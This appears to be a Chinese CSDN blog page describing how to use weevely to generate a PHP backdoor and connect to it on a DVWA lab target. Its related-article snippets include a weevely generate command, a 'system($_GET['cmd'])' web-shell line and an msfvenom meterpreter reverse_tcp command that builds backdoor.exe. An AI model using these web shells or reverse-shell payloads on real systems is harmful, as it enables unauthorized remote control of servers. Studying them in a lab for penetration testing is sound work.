利用weevely生成php后门木马

最新推荐文章于 2024-03-26 19:40:44 发布
最新推荐文章于 2024-03-26 19:40:44 发布
阅读量3.6k 收藏 5
点赞数
分类专栏: 网络安全 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_28147861/article/details/122560921
版权

Weevely工具介绍

weevely 是一款具有高隐蔽性的针对PHP 平台的Web shell。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透。下面是weevely的主要功能:

(1)它有30多种可完成自动管理渗透后期任务的功能模块。这些模块能够:执行命令和浏览远程文件系统;检测常见的服务器配置问题;创造TCP shell和reverse shell;在被测主机上安装HTTP代理;利用目标主机进行端口扫描。

(2)使用HTTP Cookie作为后门通信的载体;

(3)支持密码认证;

在终端输入weevely,查看weevely版本信息,连接后门命令格式,生成后门命令格式

根据提示生成后门

将生成后门木马backdoor.php上传至网站,这里dvwa靶场为例,根据提示连接后门 

weevely>后面输入help查看所有命令

weevely>后面输入:system_info,收集服务器上所有信息  

J.WADE
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用Weevely工具上传一句话木马
一颗小松子.的博客
01-27 3097
Weevely在上传木马进行后渗透测试的过程中可用于模拟一个类似于telnet的连接shell 通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web 页面式的管理 Weevely生成的服务器端php代码经过了base64编码,可以绕过主流的杀毒软件和IDS 上传服务器端代码后通常可以通过weevely直接运行 使用它可以浏览文件系统,检测服务器设置,创建tcpshell和reverse shell。
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
PHP Shell生成工具Weevely
weixin_34198453的博客
07-10 153
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP后门生成工具weevely分析
代码析构师的专栏
05-15 2354
唐门三少 发表于 2012-10-19 11:07 最近闲的蛋疼,玩了下weevely这个工具,感觉还是蛮强大的,防查杀,连接也是加密的。感兴趣的朋友看正文吧。 0x01 摘要 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似telnet的方式来代替web
使用工具weevely上传一句话木马
单核CPU的小朋友的博客
04-22 2443
使用 Weevely 查看使用帮助: 生成一句话木马后门: Weevely generate password /tmp/backdoor.php 也不知道为什么,只有生成在/tmp目录下才有效,所以这里我就生成在/tmp目录下了。 这里我们上传到别的机器的web服务器上。 然后使用weevely直接切入: 拿到shell。 这里不是root权限,所以还要自己想办法提权到root权限。。 ...
Weevely——PHP木马文件生成
随缘......~|-_-|~
10-08 381
php后门木马常用命令.pdf
10-10
PHP后门木马常用的函数可以分为四种类型:执行系统命令、代码执行与加密、文件包含与生成、.htaccess。 执行系统命令 * system 函数:可以执行系统命令,例如`system($_GET['cmd']);` * passthru 函数:可以执行...
php后门木马扫面工具
04-09
例如,黑客可能会利用PHP的`eval()`函数来执行动态生成的代码,或者通过包含远程文件(如`include()`或`require()`)来引入恶意内容。这些都可能成为安全隐患,因为它们允许攻击者执行任意代码,对服务器造成严重...
D盾网站源码后门木马扫描检测工具
01-27
D盾网站源码后门木马扫描检测工具
php后门URL的防范
10-26
PHP编程中,后门URL是一个严重的安全问题,它允许未经授权的用户通过URL直接访问原本应受到保护的资源。这通常发生在开发过程中,由于配置不当或疏忽,使得原本不应暴露的文件可以直接被浏览器访问。在给定的描述...
360webscan后门查杀php专版
04-18
自用的,360webscan后门查杀php专版,3个文件均能扫描,上传到网站根目录下运行
php 木马的分析(加密破解)
10-29
6. PHP木马后门功能:在源代码中,还包含了一些用于远程控制服务器的功能,例如执行系统命令、获取文件列表、文件上传下载等。通过这些功能,攻击者可以在远程服务器上执行任意代码,甚至获取服务器的最高权限。 ...
一些 PHP 管理系统程序中的后门
10-29
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
WebShellKill网站后门木马脚本查杀工具
11-17
WebShellKil是一款web后门专杀工具,不仅支持webshell的扫描,同时还支持暗链的扫描。是一款融合了多重检测引擎的查杀工具。能更精准地检测出WEB网站已知和未知的后门文件
weevely生成木马并反向shell连接msf
小刚的博客
05-13 3837
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于它用途 weevely实验环境weevely介绍使用流程1,使用weevely生成php木马文件2,将木马文件上传到被攻击web服务器3,使用weevely连接木马文件4,控制参数5,反向shell连接msf总结 今天使用一下kali系统下的中国菜刀weevely,生成木马文件、混淆木马文件控制Web服务器,并进一步反弹shell给metasploit做进一步控制。 实验环境 VM搭建的虚拟测试环境 1.p.
通过Web应用程序实现远程控制(使用weevely工具生成php恶意木马应用程序进行远程控制)
最新发布
weixin_51227348的博客
03-26 951
通过Web应用程序实现远程控制(使用weevely工具生成php恶意木马应用程序进行远程控制)
php后门管理工具weevely
weixin_30325971的博客
03-31 171
weevely是一款php后门管理工具,使用http头进行指令传输,功能强大。不过只支持php。 weevely生成的服务器端php代码是经过了base64编码的,所以可以骗过主流的杀毒软件和IDS,上传服务器端代码后通常可以通过weevely直接运行。weevely所生成PHP后门所使用的方法是现在比较主流的base64加密结合字符串变形技术,后门中所使用的函数均是常用的字符串处理函数,被作...
msfvenonm生成后门木马
07-25
您可以使用msfvenom工具来生成后门木马。msfvenom是Metasploit框架的一部分,它可以用于生成各种类型的恶意软件,包括后门木马。 下面是一个使用msfvenom生成后门木马的示例命令: ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP address> LPORT=<port> -f exe > backdoor.exe ``` 在上面的命令中,您需要将`<your IP address>`替换为您的IP地址,`<port>`替换为您要使用的端口号。这个命令将生成一个名为`backdoor.exe`的后门木马文件。 请注意,生成和使用恶意软件可能是非法的,并且可能对他人的计算机安全造成严重威胁。请确保遵守法律和道德规范,并仅在合法授权和测试环境中使用这些工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值